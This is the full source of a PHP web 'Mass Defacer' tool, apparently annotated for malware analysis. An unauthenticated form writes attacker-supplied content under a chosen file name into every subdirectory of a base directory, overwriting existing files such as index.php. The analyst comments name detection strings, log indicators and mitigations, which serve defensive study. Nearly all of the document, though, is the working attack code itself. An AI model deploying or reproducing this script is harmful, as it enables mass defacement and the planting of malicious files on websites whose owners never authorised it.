Malicious code maker

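With this tool the hacker can write malware code into the website's directories (recursively!), under whatever file name he wants. The script below drops the supplied content into every subdirectory beneath the chosen base directory, overwriting any existing file of that name. The signs to look for are a web root writable by the PHP process and identical copies of one file suddenly appearing across many folders.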

<?php

// Analyst note: NULL is passed where an integer is expected. This is apparently
// meant to silence error output and lift the execution time limit, but how a
// NULL argument is treated differs between PHP versions, so confirm on the
// affected host.
error_reporting (NULL);
set_time_limit (NULL);

// Directory separator: "/" by default, "\" when PHP_OS contains "WIN".
$ds = "/";
if (preg_match ("/WIN/", PHP_OS))
    $ds = "\\";

// The script's current working directory is offered as the default base directory.
$dir = getcwd ();
// Running total of successful writes, incremented inside mass() via `global`.
$count = 0;

// Control panel. Nothing in this script checks who is calling it, so anyone who
// can reach the file over HTTP gets the form. The literal <title> text and the
// POST field names (basedir, name, index, go) are stable strings on this sample
// and are usable for content scans of the web root and for request-log searches.
// $dir is concatenated into the value attribute without quoting or escaping.
echo '
<title>Mass Defacer by YunusIncredibl</title>
<style>.my{border: solid 1px red}</style>
<form method="POST">
Directory : <input class="my" size=40 type="text" name="basedir" value='.$dir.'><br><br>
Name : <input class="my" size=40 type="text" name="name" value="index.php"><br><br>
Your Index : <br><textarea style="width: 671px; height: 295px;" class="my" name="index"></textarea><br>
<input type="submit" value="Start" name="go">
</form>';

// Runs only when the form was submitted. The "@" hides the undefined-index
// notice on a plain GET. All three POST values go to mass() exactly as received:
// no validation of the base path, the file name or the content.
if (@$_POST['go'])
{
    echo "<textarea style='width: 875px; height: 255px;' class='my'>";
    mass ($_POST['basedir'], $_POST['name'], $_POST['index']);
    // Summary line printed after the list of written paths.
    echo "</textarea><br>Defaced : $count Folder :D";
}

/**
 * Recursively writes one payload file into every subdirectory below $dir.
 *
 * For each entry of $dir that is a directory, the content $index is written to
 * <dir>/<entry>/<name> with file_put_contents(), which replaces an existing
 * file of that name. The function then recurses into that entry whether or not
 * the write succeeded. $dir itself receives no file, only its subdirectories.
 *
 * Analyst note: the only thing limiting the writes is the filesystem permission
 * of the account PHP runs as. A document root that this account cannot write
 * to, plus file-integrity monitoring on index files, limits and reveals the
 * damage.
 *
 * @param string $dir   Base directory to walk (taken from POST "basedir").
 * @param string $name  File name to create in each subdirectory (POST "name").
 * @param string $index Content written to each file (POST "index").
 */
function mass ($dir, $name, $index)
{
    // Separator and counter are shared with the top-level script.
    global $ds;
    global $count;

    foreach (scandir2 ($dir) as $x)
    {
        if (is_dir ($dir.$ds.$x))
        {
            // file_put_contents() returns the byte count, so the path is listed
            // and counted only when the result is truthy (non-zero bytes written).
            if (file_put_contents ($dir.$ds.$x.$ds.$name, $index))
            {
                echo $dir.$ds.$x.$ds.$name."\n";
                $count++;
            }
            // Descend regardless of whether the write above succeeded.
            mass ($dir.$ds.$x, $name, $index);
        }
    }
}

/**
 * Lists the entry names of a directory, excluding "." and "..".
 *
 * Returns an empty array when $dir does not exist. If the path exists but
 * opendir() fails, the whole script terminates through die(NULL) with no
 * message.
 *
 * @param string $dir Directory to list.
 * @return array Entry names (files and directories) found in $dir.
 */
function scandir2 ($dir)
{
    $files = array ();
    if (file_exists ($dir))
    {
        // Abort the script silently when the directory cannot be opened.
        $d = opendir ($dir) or die (NULL);
        while ($file = readdir ($d))
        {
            // Skip the self and parent entries so the caller's recursion moves only downward.
            if ($file != "." && $file != "..")
            {
                array_push ($files, $file);
            }
        }
    }
    return $files;
}

?>
